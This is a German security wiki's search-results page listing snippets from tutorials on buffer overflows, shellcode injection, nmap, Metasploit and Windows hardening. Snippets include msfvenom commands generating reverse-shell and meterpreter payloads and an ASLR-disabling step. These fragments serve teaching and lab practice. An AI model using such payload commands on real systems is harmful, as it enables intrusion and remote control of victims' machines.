code

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog
39 Treffer, Zuletzt geändert:
der Funktion einen Systembefehl absetzen können <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Abhängigkeiten ===== * socat mod ... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
36 Treffer, Zuletzt geändert:
langen.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== ASLR deaktivieren ==== ASLR muss dea... mit Speicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Hilfreiche NMAP Scanner Kommandos
30 Treffer, Zuletzt geändert:
=== Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
Shellcode Injection Teil 1 @it-security:blog
30 Treffer, Zuletzt geändert:
sführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) Z... | > shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== Wir erstellen un... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); co
Group Managed Service Accounts
22 Treffer, Zuletzt geändert:
bereitungen ===== Root Key auf dem DC anlegen: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Anschließend 10 Stunden warten, um sicherzustel... MSA-Konto ===== ==== anlegen ==== Auf dem DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== testen ==== Auf dem Zielsystem: <code po
Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
22 Treffer, Zuletzt geändert:
568|kompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Abhängigkeiten ===== Was wird benöt... erflow_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR deaktivieren ===== Auch hier muss ASLR wieder d
Host Discovery mit Metasploit Datenbank
14 Treffer, Zuletzt geändert:
n. ===== Metasploit: Datenbank verbinden ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Verbindung prüfen ==== <code ruby> msf6 > db_status [*] Connected to db_name. Connection type: postgresql. Connection name: local_db_service. </code> ===== Metasploit: Workspace anlegen ===== <cod
SMB Hardening
14 Treffer, Zuletzt geändert:
ch) kann der Status wie folgt abgefragt werden: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 deaktiveren geht ebenfalls über die Powershell (Neustart erforderlich): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === Für Server gelten die gleichen
FatCat Attack PoC @it-security:blog
14 Treffer, Zuletzt geändert:
um uns volle Rechte über ein System zu sichern. <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> \\ \\ ===== Beschreibung ===== {{page>vorlagen:... oad ==== * Metasploit starten * cmd öffnen <code dos>cmd</code> * Payload generieren <code dos>msfvenom -a x86 –platform windows -p windows/meterpre
Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
12 Treffer, Zuletzt geändert:
zt können wir ''chntpw'' installieren, mittels: <code bash> sudo apt install chntpw </code> \\ \\ ==== Windows Partition finden ==== Wir suchen die Windows Partition. <code bash> sudo sfdisk -l </code> {{:it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In unserem
nmap SMBv1 Scan via Script
6 Treffer, Zuletzt geändert:
elib/smb.lua ===== Folgende Funktion einfügen: <code lua> function list_smbv1dialect(host, overrides) ... te end return true, supported_dialects end </code> ===== nmap/scripts/smbv1.nse ===== <code lua> local smb = require "smb" local stdnse = require "stdn... ething may be blocking the responses" end end </code> ===== Scan starten ===== <code bash> nmap -p13
Sichere Passwörter
4 Treffer, Zuletzt geändert:
re Passwort auszudenken. Wir bilden einen Satz: <code text> Ich bilde einen Satz mit Groß- & Kleinbuchstaben und den Zahlen 0 und 9 </code> Wir nehmen jeweils die Anfangsbuchstaben des Sa... und die Zahlen und bilden daraus das Passwort: <code text> IbeSmG&KudZ0u9 </code> So kann man recht schnell und einfach ein Passwort erstellen, welches auc
OSI Layer Cyber-Attacken
3 Treffer, Zuletzt geändert:
n]], [[wpde>Cross-Site-Scripting]], [[wpde>Remote Code Execution]] | @#ff34b3: **Anwendung** | @#c1ffc1:... plication Firewall (WAF) | | @lightsalmon: [[wpde>Code_Injection|Code Injection]], Data Format Manipulation, Serialization Attacks | @#ff34b3: **Darstellung**